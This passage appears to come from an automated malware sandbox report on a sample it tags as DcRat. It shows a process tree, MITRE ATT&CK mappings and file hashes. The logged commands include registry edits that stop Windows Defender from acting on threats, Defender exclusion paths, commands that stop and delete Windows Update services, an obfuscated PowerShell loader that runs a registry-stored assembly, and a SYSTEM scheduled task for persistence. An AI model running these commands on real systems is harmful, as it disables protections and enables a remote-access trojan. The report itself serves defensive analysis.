Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:8084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:8024
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:7444
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6992

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
PID:1632

C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe
1⤵
PID:7552

C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
C:\Users\Admin\AppData\Local\Detail\vnnaago\StringIds.exe
1⤵
PID:5696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7132 -ip 7132
1⤵
PID:2740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:7776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
1⤵
PID:2828

C:\ProgramData\common\JTPFKOXW.exe
C:\ProgramData\common\JTPFKOXW.exe
1⤵
PID:4192

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:6164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5860
- C:\Windows\system32\cmd.exe
  cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:5672
- C:\Windows\system32\cmd.exe
  cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:6156

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
PID:7936

C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ebuNsdF.exe
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ebuNsdF.exe dM /cPsite_idUZC 385118 /S
1⤵
PID:1564
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
  2⤵
  PID:8096
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:5892
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:4068
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:5516
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:6508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\QQIsWa.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
  2⤵
  - DcRat
  - Creates scheduled task(s)
  PID:2308

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{0cb67df5-9e47-4d24-bd24-2d29300f2b89}
1⤵
PID:7200

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
PID:5544

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:7920

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2b123515-ffbc-4efb-ac83-f82cd997e7e4}
1⤵
PID:7612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

Impair Defenses

Modify Registry

Scripting

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ClocX\ClocX.exe

Filesize
2.0MB

MD5
2943a5a31664a8183e993d480b8709bc

SHA1
e7c28c1692073cf3769b61a8b298d09497d2a635

SHA256
282397f5efc6b5a517881350736901620649c3cf0a692423cf77b9093f933e8b

SHA512
f6dfa47d02dc9d1d874b5618c354961ea70e7c5223c27efeb530dbcead610aa8255dfeefe3a68325db9b00ac9df6a5519c885f91ecb82e582bbfa34364cd3518

Download Submit
C:\Program Files (x86)\ClocX\Presets\Aqua.png

Filesize
29KB

MD5
73e7b2f60f8ac6fde449861ac5484755

SHA1
ff314467b04e04a70c2bcaf2c5e65c1c7b5d9274

SHA256
81dc5e6439f08edea70408774e1195fb2d01be1aae88b0a157eb7e8bc342dda3

SHA512
ea9a4c1a3f9897ac96d3a3111f6f1d5bbc32edae25b4d69fd47144e5fe5970823c3fcf81d45ebb950bdffb16cfa5ce0963f220f08bbf942a0bcfcaa025a0ca64

Download Submit
C:\Program Files (x86)\ClocX\Presets\GuldKugler.ini

Filesize
1KB

MD5
6299257e666ff7e94c35e5c06cf2c369

SHA1
283c54f59495a84734889776ed6f47ed5ab6a98e

SHA256
dbe467c95b421c4e0b99bf65a99feda9dd8c86687ff10889d3c1dfa6dbef3e3b

SHA512
942802e9022565303ed072dde09cdc564870df7fadcea4156df47aba9f38d99e5e73972bec64cfc68427b492862bbb5cade78f41d80274dfac0c684afe708113

Download Submit
C:\Program Files (x86)\ClocX\Presets\domeclock\domehour.png

Filesize
2KB

MD5
2b3ab55ee12a47f5a20f8cfa2d46724b

SHA1
1fb28f49ec9d8f2b7e90eef82cfa48c5b7bd8687

SHA256
40a519f829558e1bd12c88f891125420079d40ff3c10b5940724f8d27d69d4b3

SHA512
777b53c0912c99a4efe0b7d91bbb8d24ce4d74baec12db92905976e4635bf23fc69126309d2bda7579328170b963b0b8a6d66ae5f84c68bb8823f4ac9d79c878

Download Submit
C:\Program Files (x86)\ClocX\Presets\earth.ini

Filesize
1KB

MD5
d4c8bc1c07c0077783e15664badf33e3

SHA1
ef27b3ae33d84581098c96384784282e090afac1

SHA256
051468a847913306cf9fb5dcbf17bddab5ac36689dcba6da0374dbbb5383b6c0

SHA512
5f7c44ce2fbb1e4fa332436cafde4085a91cc55dfdc404143a586b3777aa168783f6d82396c57c443102ce9606e044845e5680209ff8234d78ccec9e5ff4632a

Download Submit
C:\Program Files (x86)\ClocX\Presets\hallow.png

Filesize
85KB

MD5
fa8384d8da635f35bf502976a6dc7f43

SHA1
4cad60130366d35dc1ea05099bafe6dea0e566a1

SHA256
af0bc4cf79640a01cf9e991d3f73993ff47d7d148f214af36b6143c269ef1bc3

SHA512
65264e3881e216f3077e724c7130e8d3f5e15f1c318d8a9ade211d480d6f485b20b5ec0d70adbf94453498cf2ba319bc1e5cfb25e81db3f6c78b983294e28127

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
1.4MB

MD5
6b0b6ecfec2951cb738b99fa83d1e5b6

SHA1
6393563eead265c884c712ad364b43fc26fc3cc1

SHA256
f6ab51f35a4fba99fa6ad7fa6ef688f1a3b32127d80b19ffb6adc4ac4b5477ef

SHA512
ca32837f8806d8b78fb61423558da0baf2c50af1ef5eb4cada0415b2423429c4c074e60c5e4814c1c3d1c877847ea2f120c7fb0d62cafb8cfd3901727e374dfb

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\d946e55e607c88b7288206bc61fc3b98

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\AVPlayer.dll

Filesize
560KB

MD5
80e71a30ec0d4c416a80b93ddffe954a

SHA1
db405382611b75cc54bd6e8ff345d6e95671b1a5

SHA256
e5d37a913f3c649163d61e661fcfe1f538ed0f69b469476f3bd5911d42612bc5

SHA512
8eb57e282eb859f670bd5fb6584ba32f6be40de5ab0a289b28694c795ea09e083a20d16c6b7bd11c7a91bf2a711c610ee04454b99dbdb707b6c9b64de4aeb180

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\AudioConverterRipper.txt

Filesize
17KB

MD5
a001e8f1d88dd261e213b4d80ae4e159

SHA1
8acb015951316f995ad588c6242ad68c068733f1

SHA256
57e57c4280434de0a072e7af734083164eb66fb09260a92ec467bb7398831529

SHA512
2243475f350e25478b576a91a3426dc29f97f84028082d9520c370e0694bce301e590dd6b348798dd189363a6009a12a6cd827550658a3bdc3178bbc383cf5e7

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-0HF9S.tmp

Filesize
11B

MD5
07a0d4dfc7fba14d52025577270bbe9c

SHA1
70537f6e7d211f310717c27ce39ddefa605ae316

SHA256
0c9dbab264861da7904ff1e5a2c2684782633e6bd8a24ef137f5091fb65dba75

SHA512
68a291ec2fd75fc89b853beb1fa24181048ec8965832081c83ce390e8fa58e77d1bc086c55d0e8a49f725ac3c7a3c769c187060683c87e0bd011b77e1c8bb0fc

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-40PPQ.tmp

Filesize
831B

MD5
8f920115a9ac5904787bc4578f161a52

SHA1
941332d718cf5161881ca903b2fb125124cac68b

SHA256
f8b63fa29af4c7cff131bf14fbdaac8e6b6945444e0f13e57417fea4a3de1a6b

SHA512
b8521748d276de667e2013c697005adc45e405fee9a9970b80427cb47ba829e2f9e31fdae2bafc54cca5aeaa4c371f4d25e1ea34989eea19e732fd129abfa1c2

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-8K3Q1.tmp

Filesize
841B

MD5
54ffd881611a92540e4c85e2759278c9

SHA1
ef0c1ec4f6efe6abdf9a23f1adcd88c4ec5b4348

SHA256
d075cbfb1b43dadcdac8cf572c18689134e59319fbe425e82c7bb7c4e7d5948c

SHA512
d9f77cacb264d080e12e765cba3e1cc69a19c186526bbcb25d093e0a83b4b4b8beef37a4acf2e803a08eb76c77d4a97a21fea74475d6d9d16a63f2137ab6253b

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-AL4R4.tmp

Filesize
17KB

MD5
ee0290674fb67ea28a8a8f5350d02978

SHA1
6716ce65ac5779e27929aab8ce511cadc71cca1b

SHA256
aa321eddbfd0b4e0a0f7d21c6f6d39d35e793e3695f480c95fb0cf139a41f4e7

SHA512
64a36e2dbb91f31cce9a2fb9db58536ad1bcbd003e4e53ed60b10b41df62b507f58ff414706f8e31ea368515b200876dad3a6123d6c1da8474575c8af49b24e8

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-FLB9K.tmp

Filesize
3KB

MD5
613ccb3ab7bc5304da08120a11bb34f2

SHA1
9e1231dc2ddc6deb2a66d494c45f0dfcf04b1d97

SHA256
565efa1b0407d221b1e6bc44811f529f98fe4d9ffb6e756b56b9525acb87ce28

SHA512
d27efae6748105c343abcdc8777d2c5065bc342569af2fd3bee92544a01ad4caefe359adf69fa56bae1fbc87f86575b797c20d821a42869d0b34ab1004b0138a

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-K443D.tmp

Filesize
18KB

MD5
b228b2036c5a1806ec576175818b50b4

SHA1
24cf76cfbc736df5dcd75667b3fb12f56a31146b

SHA256
89174706535125fe102e33884957d49b56afc918f70c9b95339e4314f2cc11f5

SHA512
98fa526f4aafde68251d002f54c4aa0a089534f39419603c4da288337d115d1b3d471c8af4d730a9d2fd0ae3f1b17c016c11b8dd4c783a23ab4f42aeec6122d6

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\Lang\is-SGGIT.tmp

Filesize
18KB

MD5
a5532bacf5e3f501794e3f6d957eba2e

SHA1
30f73bda359c631756dd1eed56abfe74d9dd8080

SHA256
8c32b39bece32598853babe9e7a8d0423426d20e8be2a03e3d63ed7268f6439c

SHA512
3a93cbe920ce00c9cf09817d6d52176bf89f7d260b3c8e7e54bfda484625ef8aa44531371d84fe410316c5e428d833993c9f8ecba75b74e0d06149219c06b364

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-032CG.tmp

Filesize
508KB

MD5
df32ee0bfc41ecd1e75583a10066ce42

SHA1
64c9165ca875641f77083891e7843ae36e339a6f

SHA256
3314b0568e577dcfafcf01195cc50c8c752be4ff42ef4b10e1d9385ae8f67e24

SHA512
03e99d8cae0a0bd59ee9b16702402a3373eb21608bd5ee53ac6de918549353544574537192fd79a76cb19ac4fb05d53dc9ea5a9394c62efe159d62209130eb1a

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-03T5F.tmp

Filesize
158KB

MD5
5df5ff79bc27995e2f10b28a12534c7c

SHA1
20edd475fb537cc3b58ac87cc5961a69cc325a7e

SHA256
4300df45af8f89947886a098afbab6899a2f67f97b6c8c15985e58187c88fd0b

SHA512
5f9297be5c976fe7a0699784e3225a21b1879f41f6626c44f8706805297eea81aaab18582e4af00968e6ffa60940092d5c05ab6a45e8ac18e6eaff29ffd699bd

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-09QIL.tmp

Filesize
24KB

MD5
8efc1ccff1469469bb317de852d69c3e

SHA1
f801cd846c8ef1bd66de67c6daffe881767526a7

SHA256
60f0076e3328ec70a4512e867f4597f3498bbd0bd421ab09ddb0e5077fbb2cfc

SHA512
fddf7f21ea76f5740b4ec5ee5f2cfbda81d5b2f5d26d90ff1d97507c7b8d1229541baaf5f3b6ebb397972d1220a4f14c295adfe562a41cb2d681d388cb39b091

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-0MP65.tmp

Filesize
166KB

MD5
e14075e1e6de40edff919368de072234

SHA1
289bf827e2c2d070bd0d919cf04284b29f34bd1c

SHA256
2a596edc9b4400cb1d494c0c6fd63253f74ffa2cb1cc7690a45205219afbff69

SHA512
6d00c632c671917db6d433c38c4589544ab380ca84779d706662acc37a9144f5f03c81a87f3394ca5136bf18fbbb8745251695cd76de84d2c2b77a7f4001464f

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-13F55.tmp

Filesize
326KB

MD5
2c33156ea27722fd08575c9ff596466c

SHA1
86d522e5a115c911a001348ad2fcff02973daa40

SHA256
ccdc0a5a0c6e46d6f5991aa0c2a74fa96b6eadfefedde4deef248bc0e05c62bd

SHA512
0193437ed87c62ba8a285b1f3a9fb044bba6295cfb83b827336e4c304bd07037ed46c23b291536c8a1a05cc2f1fbe7009dbdaf6a03a195325382c069778cb362

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-24A7G.tmp

Filesize
271KB

MD5
ddd011c6710ec9039ad2585a04e79e93

SHA1
cb6940e05f3bb789a0011bb49916e2354a72b769

SHA256
e38e353a823a54894077ef880e7159e274dfce898a0b873db3ad9332092581e8

SHA512
5cb027c05d9270a4e465118fd2fd2a0eb6fbbc968fe6a3088aad46dde70bca079ee551a2c661bf2715b8fc327748cefbf106d164a3a1cba0f9eebf025572cff1

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-29GUP.tmp

Filesize
548B

MD5
ce3ab3bd3ff80fce88dcb0ea3d48a0c9

SHA1
c6ba2c252c6d102911015d0211f6cab48095931c

SHA256
f7205c5c0a629d0cc60e30e288e339f08616be67b55757d4a403a2b54e23922b

SHA512
211e247ea82458fd68bcc91a6731e9e3630a9d5901f4be4af6099ad15a90caf2826e14846951fdd7d3b199994fd3ac97ca9e325cf0dfeb9474aea9b0d6339dd3

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-2CA58.tmp

Filesize
256KB

MD5
e79327aebac80bc5b82231dc88dd82eb

SHA1
7896689557fdcc5bc6ef614d0f869556aa8d54d8

SHA256
1c7c0e5e5a4168f74ef88aaee492bd1e8a2e6deb1bd1143b859ec37781a869b7

SHA512
f6f3af2f53f25ec1e3ded8b92bb082bca6c0a6692644f9a42b0a169da7f0b7955d4f9465b681ca7e216871f5449625b0ecc286c1be1c13fbd5277281beac108b

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-38QBH.tmp

Filesize
377KB

MD5
dc67e2fc7c127c43323e681ea2998d9e

SHA1
39e46f1733f7ff130349727352615f623a84a0f3

SHA256
c7911d1d49c9f18b31d42402534ef86d0bca47a7fdd62cb8b25806ea7dbc6d93

SHA512
a85d597cabfa2f4c4e4b20d31528eadd998e74e052d01229f4fdedc4993043f75dcbf1ecdfea3f64a92901c84fdddb34e488d28a65da1c4bdec5dd95fecb0a73

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-3CMKC.tmp

Filesize
362KB

MD5
77db62270b198c2acbc463e3f1f0b982

SHA1
ee293fefd9c439b01f4b0584a4816d2ec86221bd

SHA256
ecb3c629a4c97d83dce819e0d4b211055be55eff3444cf28a2564b3f0669fcff

SHA512
64e153891d1c636b25804404680b13e8a1f3a33cb4c41a92af6363deca7c1d4e779933556a1eb97d55b15a6ba500f102c09e4480cc5b7c91bb284e735afe8132

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-4K1Q3.tmp

Filesize
185KB

MD5
4be7d715efc9aa8e484cfed90cb355f7

SHA1
a0a42d3fe952ca4cb35bd36d4fa861da09cf5220

SHA256
73c1ea9c103214ffef68252b0fa50a9394a7026c230c4660ea8a6d02f08add6f

SHA512
fa836aa7471928531f2f1bd27b75152b044a018eb1b42f5751b734aa5237b1e4a16ecf2f84c9134a99c4c9778a4f5f6b7daedd003207e3a93b094caa9624164a

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-4PKU8.tmp

Filesize
68KB

MD5
6f346d712c867cf942d6b599adb61081

SHA1
24d942dfc2d0c7256c50b80204bb30f0d98b887a

SHA256
72e6c8dd77fa7e10a7b05ef6c3e21d3f7e4147301b0bf6e416b2d33d4e19a9c3

SHA512
1f95a211d5dd3e58d4e2682f6bf2c5380b230e9907e2882097b77b99520cd2c788f43ad2abcce617dd8ded0043e4ef1c8b6e083c44688b23109868e6cdd2364c

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-4RMU4.tmp

Filesize
287KB

MD5
fab0f7839e8a70869c288ab9f8622818

SHA1
1b2d97cd9c58a96820d47fc48356c27ab50d5113

SHA256
74968f94677fdf5c39b5dcf1c80a6d0bb03afb8763e253a4a438ac8ed7c937ef

SHA512
56629044f242042d9679c63f5860199f67e00a46a952af7430b4edb514da17764699f106717c753fe1f353cdb1d6a80f5ceea648cbc7a192b3568f0b3974f0c0

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-67UTJ.tmp

Filesize
39KB

MD5
eb5f35a941ff478f8cf3c323e0530bea

SHA1
291f389abb00859365087b87bc8bfe8fd96bf62a

SHA256
fafc57a9783f28c305b0ab4714b6d3d98411297ccbc656427ce3e98298c78d1b

SHA512
7507c2ae3775a2ff96ce66e7f7cd804cec65245f3c9910be8fb4ba44f4e718dbf2eaab17571b16b53522b91de1a74a57bbaa2c1b8da81a549d90b16979835016

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-6E07S.tmp

Filesize
154KB

MD5
3889384dfa7e0b2f7e1e0e4da154ff89

SHA1
87c741cca6a52e067635aa22f62f60980072ef09

SHA256
5956ad59994ed24777a2a6122be70261d9499b04f9843abbf2ce5d19b747a3cf

SHA512
51f0273d0363aea98f1f9127bb17406808a873a7e5023a137eae13d834eb544731f93910d0c29bef8348b30f192bdf6a7974502d8d1fc23903116c1c8c74cf30

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-8KA0R.tmp

Filesize
678KB

MD5
e48bb66621d9f15225233b6279fa3458

SHA1
4ea19ea26b0a7059800cb9c345041b746b707769

SHA256
4f6b1f848ef09b8a71138af7b7580a6eaa631914f5b1a96c2d7308e59a1968d4

SHA512
d7d969f8394a9a8f7dfaf4bdb88b662b87aacbd8b5a7aaf534c7e5ef0e83df4f7b8e3803913fe3808906984febbe194886248799cfeb5352e5d6fc4b3abe2c00

Download Submit
C:\Users\Admin\AppData\Local\HramSoft\Ree Audio Converter\is-9L08A.tmp

Filesize
188KB

MD5
9cd220af0338b8bbd8fb63205c259018

SHA1
d687a1e58781d7b5f5983d48457720afedc8d8dd

SHA256
